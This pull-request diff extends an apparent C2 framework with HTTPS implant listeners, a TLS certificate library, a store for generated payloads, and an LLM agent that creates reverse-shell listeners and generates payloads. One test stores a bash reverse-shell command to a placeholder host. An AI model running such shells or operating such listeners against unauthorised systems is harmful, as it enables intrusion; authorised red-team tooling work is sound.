### PR TITLE
feat(ops): soft refresh, INKO resize, TLS certs, https listeners

### DIFF
--- a/src/squidc5/ai/ops_tools.py
+++ b/src/squidc5/ai/ops_tools.py
@@ -28,6 +28,8 @@ TOOL_GATES: dict[str, tuple[list[str], str]] = {
     "create_task": (["tasks:write", "admin"], "tasks.create"),
     "generate_payload": (["payloads:generate", "admin"], "payloads.generate"),
     "list_payload_templates": (["payloads:generate", "admin"], "payloads.generate"),
+    "save_asset": (["payloads:generate", "profiles:write", "admin"], "payloads.generate"),
+    "list_assets": (["payloads:generate", "profiles:read", "admin"], "payloads.generate"),
     "get_metrics": (["metrics:read", "admin"], "metrics.read"),
     "list_recent_events": (["metrics:read", "sessions:read", "admin"], "metrics.read"),
     "list_audit": (["audit:read", "admin"], "audit.read"),
@@ -91,7 +93,7 @@ OPENAI_TOOLS: list[dict[str, Any]] = [
                     "name": {"type": "string", "description": "Short name e.g. rev-444"},
                     "kind": {
                         "type": "string",
-                        "enum": ["http", "tcp", "reverse_shell", "dns", "smtp"],
+                        "enum": ["http", "https", "tcp", "reverse_shell", "dns", "smtp"],
                     },
                     "port": {"type": "integer", "description": "TCP/UDP port 1-65535"},
                     "host": {
@@ -188,7 +190,8 @@ OPENAI_TOOLS: list[dict[str, Any]] = [
             "name": "generate_payload",
             "description": (
                 "Generate a deterministic payload from a template "
-                "(e.g. reverse_shell_bash, http_beacon_python)."
+                "(e.g. reverse_shell_bash, http_beacon_python). "
+                "After generate, call save_asset so the operator can reuse it."
             ),
             "parameters": {
                 "type": "object",
@@ -197,8 +200,50 @@ OPENAI_TOOLS: list[dict[str, Any]] = [
                     "host": {"type": "string"},
                     "port": {"type": "integer"},
                     "interval": {"type": "integer"},
+                    "save": {
+                        "type": "boolean",
+                        "description": "If true, also save to operator asset library",
+                    },
+                    "save_name": {"type": "string", "description": "Name when save=true"},
                 },
                 "required": ["template", "host", "port"],
+            },
+        },
+    },
+    {
+        "type": "function",
+        "function": {
+            "name": "save_asset",
+            "description": (
+                "Save generated content (payload, profile JSON, implant plan) to the "
+                "server asset library for later use by the operator."
+            ),
+            "parameters": {
+                "type": "object",
+                "properties": {
+                    "kind": {
+                        "type": "string",
+                        "enum": ["payload", "profile", "implant", "other"],
+                    },
+                    "name": {"type": "string"},
+                    "content": {"type": "string"},
+                    "meta": {"type": "object"},
+                },
+                "required": ["kind", "name", "content"],
+            },
+        },
+    },
+    {
+        "type": "function",
+        "function": {
+            "name": "list_assets",
+            "description": "List saved operator assets (payloads/profiles/implants).",
+            "parameters": {
+                "type": "object",
+                "properties": {
+                    "kind": {"type": "string"},
+                    "limit": {"type": "integer"},
+                },
             },
         },
     },
@@ -277,7 +322,8 @@ You can:
 Rules:
 - Prefer tools over guessing about live environment state.
 - When the user asks to set up a listener, create it AND start it (auto_start true or start_listener).
-- For reverse shells use kind=reverse_shell. For HTTP beacons use kind=http.
+- For reverse shells use kind=reverse_shell. For HTTP beacons use kind=http. For TLS implant HTTP use kind=https.
+- When you generate a payload/profile/implant the operator may reuse, call save_asset (or generate_payload with save=true).
 - Never invent session IDs, listener IDs, or secrets. Use tools.
 - Never dump API keys, tokens, or raw PII. Summarize tool results for the operator.
 - Do not claim you ran a tool unless you did.
@@ -353,12 +399,14 @@ def _handlers(
 
     async def create_listener(args: dict[str, Any]) -> Any:
         kind = str(args.get("kind") or "")
-        if not await state.features.enabled("http_listeners") and kind == "http":
-            raise PermissionError("HTTP listeners disabled")
+        if not await state.features.enabled("http_listeners") and kind in ("http", "https"):
+            raise PermissionError("HTTP/HTTPS listeners disabled")
         if kind in ("tcp", "reverse_shell") and not await state.features.enabled(
             "reverse_shell_listeners"
         ):
             raise PermissionError("Reverse-shell listeners disabled")
+        if kind == "smtp" and not await state.features.enabled("smtp_oast"):
+            raise PermissionError("SMTP listeners disabled")
         cfg: dict[str, Any] = {}
         if args.get("zone"):
             cfg["zone"] = str(args["zone"])
@@ -419,14 +467,64 @@ def _handlers(
             port=int(args["port"]),
             interval=int(args.get("interval") or 5),
         )
-        # payloads may be large — cap script body
+        full_payload = ""
+        if isinstance(result, dict):
+            full_payload = str(result.get("payload") or result.get("body") or "")
+        saved = None
+        if args.get("save") and full_payload:
+            sname = str(args.get("save_name") or f"{args.get('template')}-{args.get('port')}")
+            aid = await state.db.create_operator_asset(
+                kind="payload",
+                name=sname[:120],
+                content=full_payload,
+                meta={
+                    "template": args.get("template"),
+                    "host": args.get("host"),
+                    "port": args.get("port"),
+                },
+                created_by=auth.name,
+            )
+            saved = {"id": aid, "name": sname, "kind": "payload"}
+        # payloads may be large — cap script body for model context
         if isinstance(result, dict) and "payload" in result:
             body = str(result.get("payload") or "")
             if len(body) > 4000:
                 result = dict(result)
                 result["payload"] = body[:4000] + "\n...[truncated]"
                 result["truncated"] = True
+        if saved:
+            if isinstance(result, dict):
+                result = dict(result)
+                result["saved_asset"] = saved
+            else:
+                result = {"result": result, "saved_asset": saved}
         return result
+
+    async def save_asset(args: dict[str, Any]) -> Any:
+        kind = str(args.get("kind") or "other").strip().lower()
+        if kind not in ("payload", "profile", "implant", "other"):
+            raise ValueError("kind must be payload|profile|implant|other")
+        name = str(args.get("name") or "").strip()
+        content = str(args.get("content") or "")
+        if not name or not content.strip():
+            raise ValueError("name and content required")
+        meta = args.get("meta") if isinstance(args.get("meta"), dict) else {}
+        aid = await state.db.create_operator_asset(
+            kind=kind,
+            name=name[:120],
+            content=content,
+            meta=meta,
+            created_by=auth.name,
+        )
+        return {"id": aid, "kind": kind, "name": name}
+
+    async def list_assets(args: dict[str, Any]) -> Any:
+        kind = args.get("kind")
+        rows = await state.db.list_operator_assets(
+            kind=str(kind) if kind else None,
+            limit=int(args.get("limit") or 50),
+        )
+        return {"count": len(rows), "assets": rows}
 
     async def get_metrics(args: dict[str, Any]) -> Any:
         snap = await state.metrics.snapshot()
@@ -475,6 +573,8 @@ def _handlers(
         "create_task": create_task,
         "list_payload_templates": list_payload_templates,
         "generate_payload": generate_payload,
+        "save_asset": save_asset,
+        "list_assets": list_assets,
         "get_metrics": get_metrics,
         "list_recent_events": list_recent_events,
         "list_audit": list_audit,

--- a/src/squidc5/api/routes.py
+++ b/src/squidc5/api/routes.py
@@ -34,7 +34,7 @@ class TokenCreate(BaseModel):
 
 class ListenerCreate(BaseModel):
     name: str
-    kind: str = "http"  # http | tcp | reverse_shell | dns | smtp
+    kind: str = "http"  # http | https | tcp | reverse_shell | dns | smtp
     host: str = "0.0.0.0"
     port: int
     config: dict[str, Any] = Field(default_factory=dict)
@@ -108,6 +108,24 @@ class AIChatRequest(BaseModel):
     history: list[AIChatMessage] = Field(default_factory=list)
     llm_id: str | None = None
     max_rounds: int | None = None
+
+
+class MeUpdate(BaseModel):
+    name: str
+
+
+class TlsUpload(BaseModel):
+    label: str = "uploaded"
+    cert_pem: str
+    key_pem: str
+    note: str = ""
+
+
+class AssetCreate(BaseModel):
+    kind: str  # payload | profile | implant | other
+    name: str
+    content: str
+    meta: dict[str, Any] | None = None
 
 
 class ShellCommand(BaseModel):
@@ -380,6 +398,30 @@ def build_api_router() -> APIRouter:
             "actor_type": auth.actor_type,
             "token_id": auth.token_id,
         }
+
+    @api.put("/me")
+    async def update_me(
+        payload: MeUpdate,
+        request: Request,
+        auth: AuthContext = Depends(get_auth),
+    ) -> dict[str, Any]:
+        """Rename the current token actor (display name used in collab/audit)."""
+        state = get_state(request)
+        try:
+            ok = await state.tokens.rename(auth.token_id, payload.name)
+        except ValueError as e:
+            raise HTTPException(400, str(e)) from e
+        if not ok:
+            raise HTTPException(404, "token not found")
+        await state.db.audit(
+            actor=payload.name.strip(),
+            actor_type=auth.actor_type,
+            action="token.rename_self",
+            resource=auth.token_id,
+            details={"from": auth.name, "to": payload.name.strip()},
+            risk_score=2,
+        )
+        return {"ok": True, "actor": payload.name.strip(), "token_id": auth.token_id}
 
     # ----- Tokens -----
 
@@ -711,8 +753,8 @@ def build_api_router() -> APIRouter:
         auth: AuthContext = Depends(require_scope("listeners:write", "admin")),
     ) -> dict[str, Any]:
         state = get_state(request)
-        if body.kind == "http" and not await state.features.enabled("http_listeners"):
-            raise HTTPException(403, "HTTP listeners disabled by feature flag")
+        if body.kind in ("http", "https") and not await state.features.enabled("http_listeners"):
+            raise HTTPException(403, "HTTP/HTTPS listeners disabled by feature flag")
         if body.kind == "dns" and not await state.features.enabled("dns_listeners"):
             raise HTTPException(403, "DNS listeners disabled by feature flag")
         if body.kind == "smtp" and not await state.features.enabled("smtp_oast"):
@@ -1748,6 +1790,182 @@ def build_api_router() -> APIRouter:
                 }
             )
         return {"tools": tools, "note": "Railed tool-calling; policy + scopes enforced per call"}
+
+    # ----- TLS certificate library -----
+
+    @api.get("/tls/certs")
+    async def tls_list_certs(
+        request: Request,
+        auth: AuthContext = Depends(require_scope("admin")),
+    ) -> dict[str, Any]:
+        from squidc5.tls.library import list_certs
+
+        state = get_state(request)
+        return {"certs": list_certs(state.settings.data_dir)}
+
+    @api.post("/tls/certs")
+    async def tls_upload_cert(
+        payload: TlsUpload,
+        request: Request,
+        auth: AuthContext = Depends(require_scope("admin")),
+    ) -> dict[str, Any]:
+        from squidc5.tls.library import upload_cert
+
+        state = get_state(request)
+        try:
+            row = upload_cert(
+                state.settings.data_dir,
+                label=payload.label,
+                cert_pem=payload.cert_pem,
+                key_pem=payload.key_pem,
+                note=payload.note,
+            )
+        except ValueError as e:
+            raise HTTPException(400, str(e)) from e
+        await state.db.audit(
+            actor=auth.name,
+            actor_type=auth.actor_type,
+            action="tls.cert_upload",
+            resource=row.get("id"),
+            details={"label": payload.label},
+            risk_score=5,
+        )
+        return row
+
+    @api.post("/tls/certs/{cert_id}/activate")
+    async def tls_activate_cert(
+        cert_id: str,
+        request: Request,
+        auth: AuthContext = Depends(require_scope("admin")),
+    ) -> dict[str, Any]:
+        from squidc5.tls.library import activate_cert
+
+        state = get_state(request)
+        try:
+            row = activate_cert(state.settings.data_dir, cert_id)
+        except FileNotFoundError:
+            raise HTTPException(404, "certificate not found") from None
+        except ValueError as e:
+            raise HTTPException(400, str(e)) from e
+        await state.db.audit(
+            actor=auth.name,
+            actor_type=auth.actor_type,
+            action="tls.cert_activate",
+            resource=cert_id,
+            details={"restart_required": True},
+            risk_score=6,
+        )
+        return row
+
+    @api.delete("/tls/certs/{cert_id}")
+    async def tls_delete_cert(
+        cert_id: str,
+        request: Request,
+        auth: AuthContext = Depends(require_scope("admin")),
+    ) -> dict[str, Any]:
+        from squidc5.tls.library import delete_cert
+
+        state = get_state(request)
+        try:
+            ok = delete_cert(state.settings.data_dir, cert_id)
+        except ValueError as e:
+            raise HTTPException(400, str(e)) from e
+        if not ok:
+            raise HTTPException(404, "certificate not found")
+        await state.db.audit(
+            actor=auth.name,
+            actor_type=auth.actor_type,
+            action="tls.cert_delete",
+            resource=cert_id,
+            risk_score=4,
+        )
+        return {"ok": True, "id": cert_id}
+
+    # ----- Operator assets (saved payloads / profiles / implants) -----
+
+    @api.get("/assets")
+    async def list_assets(
+        request: Request,
+        kind: str | None = None,
+        limit: int = 100,
+        auth: AuthContext = Depends(require_scope("payloads:generate", "profiles:read", "admin")),
+    ) -> dict[str, Any]:
+        state = get_state(request)
+        rows = await state.db.list_operator_assets(kind=kind, limit=limit)
+        for r in rows:
+            if isinstance(r.get("meta"), str):
+                try:
+                    r["meta"] = json.loads(r["meta"])
+                except Exception:
+                    r["meta"] = {}
+        return {"assets": rows}
+
+    @api.post("/assets")
+    async def create_asset(
+        payload: AssetCreate,
+        request: Request,
+        auth: AuthContext = Depends(require_scope("payloads:generate", "profiles:write", "admin")),
+    ) -> dict[str, Any]:
+        state = get_state(request)
+        kind = (payload.kind or "other").strip().lower()
+        if kind not in ("payload", "profile", "implant", "other"):
+            raise HTTPException(400, "kind must be payload|profile|implant|other")
+        name = (payload.name or "").strip()
+        if not name or len(name) > 120:
+            raise HTTPException(400, "name required (max 120)")
+        if not (payload.content or "").strip():
+            raise HTTPException(400, "content required")
+        aid = await state.db.create_operator_asset(
+            kind=kind,
+            name=name,
+            content=payload.content,
+            meta=payload.meta,
+            created_by=auth.name,
+        )
+        await state.db.audit(
+            actor=auth.name,
+            actor_type=auth.actor_type,
+            action="assets.create",
+            resource=aid,
+            details={"kind": kind, "name": name},
+            risk_score=3,
+        )
+        return {"id": aid, "kind": kind, "name": name}
+
+    @api.get("/assets/{asset_id}")
+    async def get_asset(
+        asset_id: str,
+        request: Request,
+        auth: AuthContext = Depends(require_scope("payloads:generate", "profiles:read", "admin")),
+    ) -> dict[str, Any]:
+        row = await get_state(request).db.get_operator_asset(asset_id)
+        if not row:
+            raise HTTPException(404, "asset not found")
+        if isinstance(row.get("meta"), str):
+            try:
+                row["meta"] = json.loads(row["meta"])
+            except Exception:
+                row["meta"] = {}
+        return row
+
+    @api.delete("/assets/{asset_id}")
+    async def delete_asset(
+        asset_id: str,
+        request: Request,
+        auth: AuthContext = Depends(require_scope("payloads:generate", "admin")),
+    ) -> dict[str, Any]:
+        state = get_state(request)
+        ok = await state.db.delete_operator_asset(asset_id)
+        if not ok:
+            raise HTTPException(404, "asset not found")
+        await state.db.audit(
+            actor=auth.name,
+            actor_type=auth.actor_type,
+            action="assets.delete",
+            resource=asset_id,
+            risk_score=3,
+        )
+        return {"ok": True}
 
     # ----- Malleable C2 profiles -----
 

--- a/src/squidc5/auth/tokens.py
+++ b/src/squidc5/auth/tokens.py
@@ -131,6 +131,14 @@ class TokenService:
         {"admin", "tokens:manage", "policy:manage", "llm:manage", "plugins:manage"}
     )
 
+    async def rename(self, token_id: str, name: str) -> bool:
+        clean = (name or "").strip()
+        if not clean or len(clean) > 64:
+            raise ValueError("name must be 1-64 characters")
+        if any(c in clean for c in "\n\r\t"):
+            raise ValueError("name must not contain control characters")
+        return await self.db.rename_token(token_id, clean)
+
     async def create(
         self,
         name: str,

--- a/src/squidc5/cli.py
+++ b/src/squidc5/cli.py
@@ -982,7 +982,7 @@ def build_parser() -> argparse.ArgumentParser:
     l_create.add_argument(
         "--kind",
         default="http",
-        choices=["http", "tcp", "reverse_shell", "dns", "smtp"],
+        choices=["http", "https", "tcp", "reverse_shell", "dns", "smtp"],
     )
     l_create.add_argument("--zone", default=None, help="DNS zone when kind=dns")
     l_create.add_argument(

--- a/src/squidc5/db/migrate.py
+++ b/src/squidc5/db/migrate.py
@@ -217,10 +217,25 @@ ALTER TABLE audit_log ADD COLUMN chain_hash TEXT NOT NULL DEFAULT '';
 ALTER TABLE audit_log ADD COLUMN prev_hash TEXT NOT NULL DEFAULT '';
 """
 
+OPERATOR_ASSETS_SQL = """
+CREATE TABLE IF NOT EXISTS operator_assets (
+    id TEXT PRIMARY KEY,
+    kind TEXT NOT NULL,
+    name TEXT NOT NULL,
+    content TEXT NOT NULL DEFAULT '',
+    meta TEXT NOT NULL DEFAULT '{}',
+    created_by TEXT,
+    created_at REAL NOT NULL
+);
+CREATE INDEX IF NOT EXISTS idx_operator_assets_kind ON operator_assets(kind);
+CREATE INDEX IF NOT EXISTS idx_operator_assets_created ON operator_assets(created_at);
+"""
+
 MIGRATIONS: Sequence[tuple[int, str, str]] = (
     (1, "baseline schema", BASELINE_SQL),
     (2, "HITL approval queue", HITL_REQUESTS_SQL),
     (3, "audit integrity chain columns", AUDIT_INTEGRITY_SQL),
+    (4, "operator assets library", OPERATOR_ASSETS_SQL),
 )
 
 SCHEMA_VERSION_TABLE = """

--- a/src/squidc5/db/store.py
+++ b/src/squidc5/db/store.py
@@ -121,6 +121,57 @@ class Database:
     async def touch_token(self, token_id: str) -> None:
         await self.execute("UPDATE tokens SET last_used_at = ? WHERE id = ?", (_now(), token_id))
 
+    async def rename_token(self, token_id: str, name: str) -> bool:
+        cur = await self.execute(
+            "UPDATE tokens SET name = ? WHERE id = ? AND revoked = 0",
+            (name, token_id),
+        )
+        return cur.rowcount > 0
+
+    # --- Operator assets (saved payloads/profiles/implants) ---
+
+    async def create_operator_asset(
+        self,
+        *,
+        kind: str,
+        name: str,
+        content: str,
+        meta: dict[str, Any] | None = None,
+        created_by: str | None = None,
+    ) -> str:
+        aid = _uid("ast_")
+        await self.execute(
+            "INSERT INTO operator_assets (id, kind, name, content, meta, created_by, created_at) "
+            "VALUES (?, ?, ?, ?, ?, ?, ?)",
+            (aid, kind, name, content[:2_000_000], json.dumps(meta or {}), created_by, _now()),
+        )
+        return aid
+
+    async def list_operator_assets(
+        self, *, kind: str | None = None, limit: int = 100
+    ) -> list[dict[str, Any]]:
+        lim = min(max(int(limit), 1), 500)
+        if kind:
+            return await self.fetchall(
+                "SELECT id, kind, name, meta, created_by, created_at, "
+                "length(content) AS content_len FROM operator_assets "
+                "WHERE kind = ? ORDER BY created_at DESC LIMIT ?",
+                (kind, lim),
+            )
+        return await self.fetchall(
+            "SELECT id, kind, name, meta, created_by, created_at, "
+            "length(content) AS content_len FROM operator_assets "
+            "ORDER BY created_at DESC LIMIT ?",
+            (lim,),
+        )
+
+    async def get_operator_asset(self, asset_id: str) -> dict[str, Any] | None:
+        return await self.fetchone("SELECT * FROM operator_assets WHERE id = ?", (asset_id,))
+
+    async def delete_operator_asset(self, asset_id: str) -> bool:
+        cur = await self.execute("DELETE FROM operator_assets WHERE id = ?", (asset_id,))
+        return cur.rowcount > 0
+
     # --- Sessions ---
 
     async def create_session(

--- a/src/squidc5/listeners/manager.py
+++ b/src/squidc5/listeners/manager.py
@@ -73,10 +73,21 @@ class ListenerManager:
         host: str = "0.0.0.0",
         config: dict[str, Any] | None = None,
     ) -> dict[str, Any]:
-        if kind not in ("http", "tcp", "reverse_shell", "dns", "smtp"):
+        if kind not in ("http", "https", "tcp", "reverse_shell", "dns", "smtp"):
             raise ValueError(f"Unsupported listener kind: {kind}")
         if port < 1 or port > 65535:
             raise ValueError("Port must be 1-65535")
+        # Reject port already used by another listener (any status)
+        existing = await self.db.fetchall(
+            "SELECT id, name, status, kind FROM listeners WHERE port = ? AND host = ?",
+            (int(port), host or "0.0.0.0"),
+        )
+        if existing:
+            e0 = existing[0]
+            raise ValueError(
+                f"Port {port} already used by listener {e0.get('name') or e0.get('id')} "
+                f"({e0.get('kind')}, {e0.get('status')})"
+            )
         lid = await self.db.create_listener(name, kind, port, host, config)
         await self.metrics.emit("listener.created", {"id": lid, "kind": kind, "port": port})
         row = await self.db.get_listener(lid)
@@ -99,20 +110,40 @@ class ListenerManager:
             kind = row["kind"]
             host = row["host"]
             port = int(row["port"])
-            if kind == "http":
+            if kind in ("http", "https"):
                 from squidc5.listeners.http_listener import handle_http_client
 
+                ssl_ctx = None
+                if kind == "https":
+                    import ssl
+
+                    from squidc5.tls.library import resolve_listener_ssl_paths
+
+                    data_dir = getattr(self, "data_dir", None)
+                    if data_dir is None:
+                        raise ValueError("HTTPS listener requires data_dir on ListenerManager")
+                    paths = resolve_listener_ssl_paths(data_dir)
+                    if not paths:
+                        raise ValueError(
+                            "No TLS certificate available for HTTPS — upload one under Admin → TLS"
+                        )
+                    cert_p, key_p = paths
+                    ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
+                    ssl_ctx.load_cert_chain(str(cert_p), str(key_p))
                 server = await asyncio.start_server(
                     lambda r, w: handle_http_client(self, listener_id, r, w),
                     host=host,
                     port=port,
+                    ssl=ssl_ctx,
                 )
                 self._servers[listener_id] = server
-                task = asyncio.create_task(server.serve_forever(), name=f"listener-http-{listener_id}")
+                task = asyncio.create_task(
+                    server.serve_forever(), name=f"listener-{kind}-{listener_id}"
+                )
                 self._tasks[listener_id] = task
                 self._attach_supervisor(listener_id, task)
                 await self.db.set_listener_status(listener_id, "running")
-                log.info("Started http listener %s on %s:%s", listener_id, host, port)
+                log.info("Started %s listener %s on %s:%s", kind, listener_id, host, port)
             elif kind == "dns":
                 from squidc5.listeners.dns_listener import start_dns_server
 

--- a/src/squidc5/main.py
+++ b/src/squidc5/main.py
@@ -115,6 +115,7 @@ async def build_state(settings: Settings) -> AppState:
     listeners.oast = oast if settings.oast_enabled else None
     listeners.oast_zone = settings.oast_zone
     listeners.public_ip = settings.public_ip or settings.public_host
+    listeners.data_dir = settings.data_dir
     sessions.interactive_check = listeners.is_live
     sessions.verified_check = listeners.is_verified
     sessions.exec_probe = listeners.probe_exec

--- a/src/squidc5/tls/library.py
+++ b/src/squidc5/tls/library.py
@@ -1,0 +1,159 @@
+"""TLS certificate library under data_dir/tls/library/ + active selection."""
+
+from __future__ import annotations
+
+import json
+import re
+import secrets
+import shutil
+import time
+from pathlib import Path
+from typing import Any
+
+from squidc5.tls.certs import CERT_DIRNAME, tls_material_paths
+
+_SAFE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")
+
+
+def _lib_root(data_dir: Path) -> Path:
+    p = Path(data_dir) / CERT_DIRNAME / "library"
+    p.mkdir(parents=True, exist_ok=True)
+    return p
+
+
+def _active_path(data_dir: Path) -> Path:
+    return Path(data_dir) / CERT_DIRNAME / "active.json"
+
+
+def list_certs(data_dir: Path) -> list[dict[str, Any]]:
+    root = _lib_root(data_dir)
+    active = get_active_id(data_dir)
+    out: list[dict[str, Any]] = []
+    for d in sorted(root.iterdir() if root.is_dir() else [], key=lambda x: x.name):
+        if not d.is_dir():
+            continue
+        cert = d / "fullchain.pem"
+        key = d / "privkey.pem"
+        meta_p = d / "meta.json"
+        meta: dict[str, Any] = {}
+        if meta_p.is_file():
+            try:
+                meta = json.loads(meta_p.read_text(encoding="utf-8"))
+            except Exception:
+                meta = {}
+        out.append(
+            {
+                "id": d.name,
+                "label": meta.get("label") or d.name,
+                "note": meta.get("note") or "",
+                "created_at": meta.get("created_at"),
+                "has_cert": cert.is_file() and cert.stat().st_size > 0,
+                "has_key": key.is_file() and key.stat().st_size > 0,
+                "active": d.name == active,
+            }
+        )
+    return out
+
+
+def get_active_id(data_dir: Path) -> str | None:
+    p = _active_path(data_dir)
+    if not p.is_file():
+        return None
+    try:
+        data = json.loads(p.read_text(encoding="utf-8"))
+        return str(data.get("id") or "") or None
+    except Exception:
+        return None
+
+
+def upload_cert(
+    data_dir: Path,
+    *,
+    label: str,
+    cert_pem: str,
+    key_pem: str,
+    note: str = "",
+) -> dict[str, Any]:
+    cert_pem = (cert_pem or "").strip()
+    key_pem = (key_pem or "").strip()
+    if "BEGIN CERTIFICATE" not in cert_pem:
+        raise ValueError("cert_pem must be PEM (BEGIN CERTIFICATE)")
+    if "BEGIN" not in key_pem or "PRIVATE KEY" not in key_pem:
+        raise ValueError("key_pem must be PEM private key")
+    if len(cert_pem) > 512_000 or len(key_pem) > 512_000:
+        raise ValueError("cert/key too large")
+    cid = "tls_" + secrets.token_hex(6)
+    dest = _lib_root(data_dir) / cid
+    dest.mkdir(parents=True, exist_ok=False)
+    (dest / "fullchain.pem").write_text(cert_pem + ("\n" if not cert_pem.endswith("\n") else ""), encoding="utf-8")
+    (dest / "privkey.pem").write_text(key_pem + ("\n" if not key_pem.endswith("\n") else ""), encoding="utf-8")
+    try:
+        (dest / "privkey.pem").chmod(0o600)
+    except OSError:
+        pass
+    clean_label = (label or cid).strip()[:80] or cid
+    meta = {
+        "label": clean_label,
+        "note": (note or "").strip()[:200],
+        "created_at": time.time(),
+    }
+    (dest / "meta.json").write_text(json.dumps(meta), encoding="utf-8")
+    return {"id": cid, **meta, "active": False}
+
+
+def activate_cert(data_dir: Path, cert_id: str) -> dict[str, Any]:
+    cid = (cert_id or "").strip()
+    if not _SAFE.match(cid) and not cid.startswith("tls_"):
+        # allow tls_ hex ids
+        if not re.match(r"^tls_[a-f0-9]+$", cid):
+            raise ValueError("invalid cert id")
+    src = _lib_root(data_dir) / cid
+    cert_src = src / "fullchain.pem"
+    key_src = src / "privkey.pem"
+    if not cert_src.is_file() or not key_src.is_file():
+        raise FileNotFoundError("certificate not found in library")
+    cert_dst, key_dst = tls_material_paths(data_dir)
+    cert_dst.parent.mkdir(parents=True, exist_ok=True)
+    shutil.copy2(cert_src, cert_dst)
+    shutil.copy2(key_src, key_dst)
+    try:
+        key_dst.chmod(0o600)
+    except OSError:
+        pass
+    _active_path(data_dir).write_text(
+        json.dumps({"id": cid, "activated_at": time.time()}),
+        encoding="utf-8",
+    )
+    return {
+        "id": cid,
+        "active": True,
+        "cert_path": str(cert_dst),
+        "key_path": str(key_dst),
+        "restart_required": True,
+        "note": "TLS material updated on disk. Restart squidc5 to serve the new certificate.",
+    }
+
+
+def delete_cert(data_dir: Path, cert_id: str) -> bool:
+    cid = (cert_id or "").strip()
+    if get_active_id(data_dir) == cid:
+        raise ValueError("cannot delete the active certificate; activate another first")
+    src = _lib_root(data_dir) / cid
+    if not src.is_dir():
+        return False
+    shutil.rmtree(src)
+    return True
+
+
+def resolve_listener_ssl_paths(data_dir: Path) -> tuple[Path, Path] | None:
+    """Paths for HTTPS listeners — prefer active library cert, else instance TLS."""
+    active = get_active_id(data_dir)
+    if active:
+        d = _lib_root(data_dir) / active
+        c, k = d / "fullchain.pem", d / "privkey.pem"
+        if c.is_file() and k.is_file():
+            return c, k
+    c, k = tls_material_paths(data_dir)
+    if c.is_file() and k.is_file():
+        return c, k
+    return None

--- a/tests/test_ops_ux_extras.py
+++ b/tests/test_ops_ux_extras.py
@@ -1,0 +1,136 @@
+"""Listener port conflict, actor rename, assets, TLS library."""
+
+from __future__ import annotations
+
+import pytest
+from httpx import ASGITransport, AsyncClient
+
+from squidc5.config import Settings
+from squidc5.main import create_app
+
+ADMIN = "sc5_test_admin_token_bootstrap_opsux01"
+
+
+def _settings(tmp_path, **kw):
+    base = dict(
+        data_dir=tmp_path / "d",
+        debug=True,
+        mcp_enabled=False,
+        admin_token_bootstrap=ADMIN,
+        plugin_signing_secret="test-plugin-signing-secret-for-ci",
+        rate_limit_per_minute=5000,
+        tls_enabled=False,
+    )
+    base.update(kw)
+    return Settings(**base)
+
+
+@pytest.mark.asyncio
+async def test_listener_port_conflict_and_https_kind(tmp_path):
+    app = create_app(_settings(tmp_path))
+    async with app.router.lifespan_context(app):
+        transport = ASGITransport(app=app)
+        async with AsyncClient(transport=transport, base_url="http://test") as client:
+            h = {"Authorization": f"Bearer {ADMIN}"}
+            r1 = await client.post(
+                "/api/v1/listeners",
+                headers=h,
+                json={"name": "a", "kind": "http", "port": 18080, "host": "0.0.0.0"},
+            )
+            assert r1.status_code == 200, r1.text
+            r2 = await client.post(
+                "/api/v1/listeners",
+                headers=h,
+                json={"name": "b", "kind": "tcp", "port": 18080, "host": "0.0.0.0"},
+            )
+            assert r2.status_code == 400
+            assert "already used" in r2.text.lower() or "port" in r2.text.lower()
+            # https kind accepted at create (start may need cert)
+            r3 = await client.post(
+                "/api/v1/listeners",
+                headers=h,
+                json={"name": "tls", "kind": "https", "port": 18443, "host": "0.0.0.0"},
+            )
+            assert r3.status_code == 200, r3.text
+            assert r3.json()["kind"] == "https"
+            # smtp kind
+            r4 = await client.post(
+                "/api/v1/listeners",
+                headers=h,
+                json={"name": "mail", "kind": "smtp", "port": 12525, "host": "0.0.0.0"},
+            )
+            # may 403 if smtp feature off
+            assert r4.status_code in (200, 403)
+
+
+@pytest.mark.asyncio
+async def test_rename_actor(tmp_path):
+    app = create_app(_settings(tmp_path))
+    async with app.router.lifespan_context(app):
+        transport = ASGITransport(app=app)
+        async with AsyncClient(transport=transport, base_url="http://test") as client:
+            h = {"Authorization": f"Bearer {ADMIN}"}
+            r = await client.put("/api/v1/me", headers=h, json={"name": "ops-lead"})
+            assert r.status_code == 200, r.text
+            assert r.json()["actor"] == "ops-lead"
+            # new requests see new name
+            meta = await client.get("/api/v1/meta", headers=h)
+            assert meta.json()["actor"] == "ops-lead"
+
+
+@pytest.mark.asyncio
+async def test_operator_assets_crud(tmp_path):
+    app = create_app(_settings(tmp_path))
+    async with app.router.lifespan_context(app):
+        transport = ASGITransport(app=app)
+        async with AsyncClient(transport=transport, base_url="http://test") as client:
+            h = {"Authorization": f"Bearer {ADMIN}"}
+            r = await client.post(
+                "/api/v1/assets",
+                headers=h,
+                json={
+                    "kind": "payload",
+                    "name": "rev-bash-4444",
+                    "content": "bash -i >& /dev/tcp/x/4444 0>&1\n",
+                    "meta": {"template": "reverse_shell_bash"},
+                },
+            )
+            assert r.status_code == 200, r.text
+            aid = r.json()["id"]
+            lst = await client.get("/api/v1/assets", headers=h)
+            assert lst.status_code == 200
+            assert any(a["id"] == aid for a in lst.json()["assets"])
+            one = await client.get(f"/api/v1/assets/{aid}", headers=h)
+            assert "bash -i" in one.json()["content"]
+            d = await client.delete(f"/api/v1/assets/{aid}", headers=h)
+            assert d.status_code == 200
+
+
+@pytest.mark.asyncio
+async def test_tls_upload_and_activate(tmp_path):
+    from squidc5.tls.certs import generate_self_signed
+
+    app = create_app(_settings(tmp_path))
+    data = tmp_path / "d"
+    cert = data / "t.crt"
+    key = data / "t.key"
+    data.mkdir(parents=True, exist_ok=True)
+    generate_self_signed(cert, key, public_host="test.local", instance_id="test01")
+    cert_pem = cert.read_text()
+    key_pem = key.read_text()
+    async with app.router.lifespan_context(app):
+        transport = ASGITransport(app=app)
+        async with AsyncClient(transport=transport, base_url="http://test") as client:
+            h = {"Authorization": f"Bearer {ADMIN}"}
+            up = await client.post(
+                "/api/v1/tls/certs",
+                headers=h,
+                json={"label": "lab", "cert_pem": cert_pem, "key_pem": key_pem},
+            )
+            assert up.status_code == 200, up.text
+            cid = up.json()["id"]
+            act = await client.post(f"/api/v1/tls/certs/{cid}/activate", headers=h)
+            assert act.status_code == 200, act.text
+            assert act.json().get("restart_required") is True
+            lst = await client.get("/api/v1/tls/certs", headers=h)
+            assert any(c["id"] == cid and c["active"] for c in lst.json()["certs"])

--- a/web/ops-admin.js
+++ b/web/ops-admin.js
